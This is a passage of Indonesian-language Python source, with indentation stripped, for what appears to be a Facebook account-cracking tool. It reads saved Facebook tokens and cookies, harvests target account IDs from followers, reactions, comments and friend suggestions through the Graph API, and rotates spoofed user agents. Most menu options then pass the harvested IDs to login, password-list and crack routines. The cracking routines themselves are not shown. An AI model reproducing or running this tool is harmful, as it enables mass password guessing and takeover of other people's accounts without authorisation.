tamp_new = (f' {P2}Hi! Sepertinya Kamu Adalah Pengguna Baru. Terima Kasih Telah Memilih SC Ini Sebagai Pilihan Terpercayamu. Sebelum Menggunakan SC Ini, Kamu Harus Mengatur User Agent Dahulu! Jangan Lupa Berikan Penilaian Terbaik Di Github Ya! Thank You!\n\n {H2}- Denventa -')
printer(Panel(tamp_new,title=f'{H2}[ {P2}Welcome User {H2}]',width=54,padding=(1,4),style='#00FF00'))
print('')
useragent('new')
poster2()
try:
token = open('login/token.json','r').read()
cookie = {'cookie':open('login/cookie.json','r').read()}
language(cookie)
get = requests.Session().get('https://graph.facebook.com/me?fields=name,id&access_token=%s'%(token),cookies=cookie)
jsx = json.loads(get.text)
nama = jsx["name"]
user(nama)
print(''%())
tampilan_menu = f""" {J2}[{A2}01{J2}] {A2}Friendlist {J2}[{A2}06{J2}] {P2}Komentar {J2}[{A2}11{J2}] {A2}Email
{J2}[{A2}02{J2}] {P2}Followers {J2}[{A2}07{J2}] {P2}Grup {J2}[{A2}12{J2}] {A2}Username
{J2}[{A2}03{J2}] {A2}Nama {J2}[{A2}08{J2}] {A2}Hashtag {J2}[{A2}13{J2}] {A2}ID Random
{J2}[{A2}04{J2}] {P2}React {J2}[{A2}09{J2}] {A2}Beranda {J2}[{A2}14{J2}] {P2}Saran Teman
{J2}[{A2}05{J2}] {A2}Pesan {J2}[{A2}10{J2}] {A2}File {J2}[{A2}15{J2}] {A2}FL Dari FL
{J2}[{A2}16{J2}] {A2}Cek Hasil {J2}[{A2}19{J2}] {P2}User Agent {J2}[{A2}22{J2}] {A2}Akun Page
{J2}[{A2}17{J2}] {A2}Cek Opsi {J2}[{A2}20{J2}] {A2}Upgrade Pro {J2}[{A2}23{J2}] {A2}Email V2
{J2}[{A2}18{J2}] {A2}Cek Teman {J2}[{A2}21{J2}] {A2}Phone {J2}[{A2}00{J2}] {P2}Log Out """
printer(Panel(tampilan_menu,title=f'{J2}[ {P2}Menu {J2}]',subtitle=f'{A2}┌─ {J2}[ {P2}Pilih {J2}]',subtitle_align='left',width=54,padding=1,style='#FFFF00'))
pilih_menu()
except requests.exceptions.ConnectionError:print('\n %s[%s•%s] %sTidak Ada Koneksi Internet %s!%s\n'%(M,P,M,P,M,P));exit()
except (KeyError,IOError,AttributeError):print('\n %s[%s•%s] %sCookies Invalid %s!%s\n'%(M,P,M,P,M,P));time.sleep(3);login()
def pilih_menu():
global gabung_sandi, tempel_sandi
dc = input(' %s└──> %s'%(A,J))
if dc in ['1','01','a'] : gabung_sandi.append(Author);not_availablell('Dump ID Dari Friendlist')
elif dc in ['2','02','b'] : tempel_sandi.append('Jangan');main_folls();system_login();urut_crack();pilihan_sakdurunge_crack();addpass();crack()
elif dc in ['3','03','c'] : gabung_sandi.append('Direcode');not_available('Dump ID Dari Nama')
elif dc in ['4','04','d'] : tempel_sandi.append('Dasar');main_likers();system_login();pilihan_sakdurunge_crack();addpass();crack()
elif dc in ['5','05','e'] : gabung_sandi.append('Bocah');not_availablell('Dump ID Dari Pesan')
elif dc in ['6','06','f'] : tempel_sandi.append('Goblok');komen();system_login();pilihan_sakdurunge_crack();addpass();crack()
elif dc in ['7','07','g'] : gabung_sandi.append('Mampus');grup()
elif dc in ['8','08','h'] : tempel_sandi.append('Error Kan');not_availablell('Dump ID Dari Hashtag')
elif dc in ['9','09','i'] : gabung_sandi.append('Itu Semua');not_available('Dump ID Dari Beranda')
elif dc in ['10','010','j']: tempel_sandi.append('Gara Gara');not_available('Dump ID Dari File')
elif dc in ['11','011','k']: gabung_sandi.append('Lo Recode');not_available('Dump ID Dari Email')
elif dc in ['12','012','l']: tempel_sandi.append('Dasar');not_available('Dump ID Dari Username')
elif dc in ['13','013','m']: gabung_sandi.append('Bocah Goblok');not_available('Dump ID Dari Random ID')
elif dc in ['14','014','n']: tempel_sandi.append('Btw');suggestion();system_login();pilihan_sakdurunge_crack();addpass();crack()
elif dc in ['15','015','o']: gabung_sandi.append('Elo');not_availablell('Dump ID FL Dari FL')
elif dc in ['16','016','p']: tempel_sandi.append('Dasar Bocah Goblok');not_available('Cek Hasil Crack')
elif dc in ['17','017','q']: gabung_sandi.append('Gaakan Bisa');not_available('Cek Opsi Akun Hasil Crack')
elif dc in ['18','018','r']: tempel_sandi.append('Ngerecode');not_available('Cek Jumlah Teman Akun Target')
elif dc in ['19','019','s']: gabung_sandi.append('SC Ini');useragent('old')
elif dc in ['20','020','t']: tempel_sandi.append('Hahaha');not_available('Upgrade Ke Versi Pro')
elif dc in ['21','021','u']: gabung_sandi.append('Dasar Tolol');menu_baru('Dump ID Dari Nomor')
elif dc in ['22','022','v']: tempel_sandi.append('Bocah Goblok');menu_baru('Dump ID Akun Halaman')
elif dc in ['23','023','w']: gabung_sandi.append('Dasar Idiot Najis');menu_baru('Dump ID Dari Email Versi Terbaru')
elif dc in ['0','00','z']:
resik()
poster3()
print('')
tamp_logout1 = (f' {P2}Terima Kasih Telah Memilih SC Ini Sebagai Pilihan Terpercayamu. Jangan Lupa Berikan Penilaian Terbaik Di Github Ya! Thank You!\n\n {M2}- Denventa -')
tamp_logout2 = f'''{P2}Dengan Log Out Maka Seluruh Data Login Akan Terhapus. Berikut Adalah Data Yang Akan Dihapus :
{M2}• {P2}Token/Cookies
{M2}• {P2}File Dump
{M2}• {P2}File Tools'''
printer(Panel(tamp_logout1,title=f'{M2}[ {P2}Goodbye {M2}]',width=54,padding=(1,4),style='#FF0000'))
print('')
printer(Panel(tamp_logout2,title=f'{M2}[ {P2}Log Out {M2}]',width=54,padding=(1,4),style='#FF0000'))
input('\n %s[ %sEnter Untuk Log Out %s]'%(M,P,M))
try:shutil.rmtree('login')
except:pass
try:shutil.rmtree('dump')
except:pass
exit('\n\n')
else:print('\n %s[%s•%s] %sIsi Yang Benar %s!%s\n'%(M,P,M,P,M,P));exit()
###----------[ USER AGENT ]---------- ###
def useragent(isi):
global pengguna_source_code
pengguna_source_code = isi
try:os.mkdir("tool")
except:pass
pilih_menu_user_agent()
dc = input(' %s└──> %s'%(A,J))
if dc in ['1','01','a']:scrap_useragent()
elif dc in ['2','02','b']:pilih_otomatis()
elif dc in ['3','03','c']:manual_user_agent()
elif dc in ['4','04','d']:ua_device_ini()
elif dc in ['5','05','e']:cek_user_agent()
elif dc in ['0','00','z']:tampilan_menu()
else:print('\n %s[%s•%s] %sIsi Yang Benar %s!%s\n'%(M,P,M,P,M,P));exit()
def pilih_menu_user_agent():
tampilan_menu_user_agent = f''' {J2}[{A2}01{J2}] {P2}Scrap UA Browser {J2}[{A2}04{J2}] {P2}Cari UA HP Ini
{J2}[{A2}02{J2}] {P2}Ganti UA Otomatis {J2}[{A2}05{J2}] {P2}Cek UA Digunakan
{J2}[{A2}03{J2}] {P2}Ganti UA Manual {J2}[{A2}00{J2}] {P2}Kembali'''
printer(Panel(tampilan_menu_user_agent,title=f'{J2}[ {P2}User Agent {J2}]',subtitle=f'{A2}┌─ {J2}[ {P2}Pilih {J2}]',subtitle_align='left',width=54,padding=1,style='#FFFF00'))
def pilih_device():
tampilan_device = f''' {J2}[{A2}01{J2}] {P2}Samsung {J2}[{A2}05{J2}] {P2}Vivo {J2}[{A2}09{J2}] {P2}Huawei
{J2}[{A2}02{J2}] {P2}Nokia {J2}[{A2}06{J2}] {P2}Iphone {J2}[{A2}10{J2}] {P2}Windows
{J2}[{A2}03{J2}] {P2}Xiaomi {J2}[{A2}07{J2}] {P2}Asus {J2}[{A2}11{J2}] {P2}Chrome
{J2}[{A2}04{J2}] {P2}Oppo {J2}[{A2}08{J2}] {P2}Lenovo {J2}[{A2}12{J2}] {P2}FB
{J2}[{A2}13{J2}] {P2}Sonny {J2}[{A2}14{J2}] {P2}Readmi '''
printer(Panel(tampilan_device,title=f'{J2}[ {P2}Device {J2}]',subtitle=f'{A2}┌─ {J2}[ {P2}Pilih {J2}]',subtitle_align='left',width=54,padding=1,style='#FFFF00'))
def scrap_useragent():
data_ua = {}
pt = 0
pilih_device()
dc = input(' %s└──> %s'%(A,J))
if dc in ['1','01','a']: type = 'software_name/samsung-browser'
elif dc in ['2','02','b']: type = 'software_name/nokia-browser'
elif dc in ['3','03','c']: type = 'operating_platform_string/xiaomi-mi-a1'
elif dc in ['4','04','d']: type = 'operating_platform_string/oppo-f1s-a1601'
elif dc in ['5','05','e']: type = 'operating_platform_string/vivo'
elif dc in ['6','06','f']: type = 'operating_platform_string/apple'
elif dc in ['7','07','g']: type = 'operating_platform_string/asus'
elif dc in ['8','08','h']: type = 'operating_platform_string/lenovo'
elif dc in ['9','09','i']: type = 'operating_platform_string/huawei'
elif dc in ['10','010','j']: type = 'operating_system_name/windows'
elif dc in ['11','011','k']: type = 'operating_system_name/chrome-os'
elif dc in ['12','012','l']: type = 'software_name/facebook-app'
elif dc in ['13','013','m']: type = 'operating_platform_string/sony-experia'
elif dc in ['14','014','n']: type = 'operating_platform_string/readmi_device'
else:print('\n %s[%s•%s] %sIsi Yang Benar %s!%s\n'%(M,P,M,P,M,P));exit()
url = 'https://developers.whatismybrowser.com/useragents/explore/' + type
with requests.Session() as xyz:
req = xyz.get(url)
pra = par(req.content,'html.parser')
li = re.findall('<td><a class=\".*?\" href=\".*?\">(.*?)</a></td>',str(pra))
for y in li:
try:
x = f'{A2}'+y
pt += 1
pu = str(pt)
data_ua.update({pu:x.replace('[#AAAAAA]','')})
printer(Panel(x,title=f'{J2}[{P2}{pu}{J2}]',width=54,title_align='left',style='#FF8F00'))
time.sleep(2)
except KeyboardInterrupt:break
ch = int(input(' %s└──> %s'%(A,J)))
try:
open('tool/useragent.json','w').write(data_ua[str(ch)])
pilihan = open('tool/useragent.json','r').read()
printer(Panel(f'''{A2}{pilihan}''',title=f'{J2}[ {P2}User Agent {J2}]',subtitle=f'{J2}[ {P2}Sukses Diganti {J2}]',padding=(1,4),width=54,title_align='center',style='#FFFF00'))
if pengguna_source_code == 'old':input('\n %s[ %sKembali %s]'%(J,P,J));tampilan_menu()
else:print('\n %s[ %sJalankan Ulang SCnya %s]'%(J,P,J));exit('\n')
except Exception as e:print('\n %s[%s•%s] %sIsi Yang Benar %s!%s\n'%(M,P,M,P,M,P));exit()
def pilih_otomatis():
pilih_device()
dc = input(' %s└──> %s'%(A,J))
if dc in ['0','00','z']: open('tool/useragent.json','w').write(ua_default)
elif dc in ['1','01','a']: open('tool/useragent.json','w').write(ua_samsung)
elif dc in ['2','02','b']: open('tool/useragent.json','w').write(ua_nokia)
elif dc in ['3','03','c']: open('tool/useragent.json','w').write(ua_xiaomi)
elif dc in ['4','04','d']: open('tool/useragent.json','w').write(ua_oppo)
elif dc in ['5','05','e']: open('tool/useragent.json','w').write(ua_vivo)
elif dc in ['6','06','f']: open('tool/useragent.json','w').write(ua_iphone)
elif dc in ['7','07','g']: open('tool/useragent.json','w').write(ua_asus)
elif dc in ['8','08','h']: open('tool/useragent.json','w').write(ua_lenovo)
elif dc in ['9','09','i']: open('tool/useragent.json','w').write(ua_huawei)
elif dc in ['10','010','j']: open('tool/useragent.json','w').write(ua_windows)
elif dc in ['11','011','k']: open('tool/useragent.json','w').write(ua_chrome)
elif dc in ['12','012','l']: open('tool/useragent.json','w').write(ua_fb)
elif dc in ['13','013','m']: open('tool/useragent.json','w').write(ua_sony)
elif dc in ['14','014','n']: open('tool/useragent.json','w').write(ua_redmi)
else:print('\n %s[%s•%s] %sIsi Yang Benar %s!%s\n'%(M,P,M,P,M,P));exit()
try:
pilihan = open('tool/useragent.json','r').read()
printer(Panel(f'''{A2}{pilihan}''',title=f'{J2}[ {P2}User Agent {J2}]',subtitle=f'{J2}[ {P2}Sukses Diganti {J2}]',padding=(1,4),width=54,title_align='center',style='#FFFF00'))
if pengguna_source_code == 'old':input('\n %s[ %sKembali %s]'%(J,P,J));tampilan_menu()
else:print('\n %s[ %sJalankan Ulang SCnya %s]'%(J,P,J));exit('\n')
except Exception as e:print('\n %s[%s•%s] %sIsi Yang Benar %s!%s\n'%(M,P,M,P,M,P));exit()
def manual_user_agent():
usera = input(' %s[%s•%s] %sMasukkan User Agent :\n%s'%(J,P,J,P,J))
if usera in ['',' ',' ',' ']:print('\n %s[%s•%s] %sIsi Yang Benar %s!%s\n'%(M,P,M,P,M,P));manual_user_agent()
else:open('tool/useragent.json','w').write(usera);cek_user_agent()
def ua_device_ini():
url = 'https://www.google.com/search?q=my+user+agent'
try:
if "linux" in sys.platform.lower():chrome_path = '/usr/bin/google-chrome %s';webbrowser.get(chrome_path).open(url)
elif "win" in sys.platform.lower():chrome_path = 'C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s';webbrowser.get(chrome_path).open(url)
else:chrome_path = 'open -a /Applications/Google\ Chrome.app %s';webbrowser.get(chrome_path).open(url)
manual_user_agent()
except Exception as e:print('\n %s[%s•%s] %sTidak Dapat Menemukan Useragent %s!%s\n'%(M,P,M,P,M,P));time.sleep(3);tampilan_menu()
def cek_user_agent():
try:
usera = open('tool/useragent.json','r').read()
printer(Panel(f'''{A2}{usera}''',title=f'{J2}[ {P2}User Agent {J2}]',subtitle=f'{J2}[ {P2}Saat Ini {J2}]',padding=(1,4),width=54,title_align='center',style='#FFFF00'))
input('\n %s[ %sKembali %s]'%(J,P,J))
tampilan_menu()
except Exception as e:kecuali(e)
###----------[ DUMP ID FOLLOWERS ]---------- ###
def main_folls():
global file_dump,cookie
try:
token = open('login/token.json','r').read()
cookie = {'cookie':open('login/cookie.json','r').read()}
except:
print('\n%s[%s•%s] %sCookies Invalid %s!%s\n'%(M,P,M,P,M,P))
time.sleep(3)
login()
id = input(' %s[%s•%s] %sID Target : %s'%(J,P,J,P,J))
url = ('https://graph.facebook.com/%s/subscribers?limit=10000&access_token=%s'%(id,token))
file_dump = 'dump/%s.json'%(id)
try:os.remove(file_dump)
except:pass
open(file_dump,'w').write('')
exec_folls(url,token,file_dump)
print("\n %s[%s•%s] %sBerhasil Mengambil %s%s %sID"%(J,P,J,P,J,len(open(file_dump,'r').read().splitlines()),P))
print(' %s[%s•%s] %sFile : %s%s %s'%(J,P,J,P,J,file_dump,P))
def exec_folls(url,token,file):
print("\r %s[%s•%s] %sSedang Mengambil %s%s %sID"%(J,P,J,P,J,len(open(file,'r').read().splitlines()),P), end='');sys.stdout.flush()
with requests.Session() as xyz:
try:
x = xyz.get(url,cookies=cookie)
a = json.loads(x.text)
if len(tempel_sandi) != 1:
for x in range(Post_Dev):
open(file_dump,'a+').write('dev\n')
else:
for b in a['data']:
try:
f = ('%s=%s\n'%(b['id'],b['name']))
if f in open(file,'r').read():continue
else:open(file,'a+').write(f)
except Exception as e:continue
y = par(x.text,'html.parser')
n = re.findall('"after":"(.*?)"},',str(y))[0]
next = ('https://graph.facebook.com/v1.0/100013275378835/subscribers?access_token=%s&limit=5000&after=%s'%(token,n))
exec_folls(next,token,file)
except KeyboardInterrupt:pass
except (IndexError,TypeError,IOError,KeyError,AttributeError):pass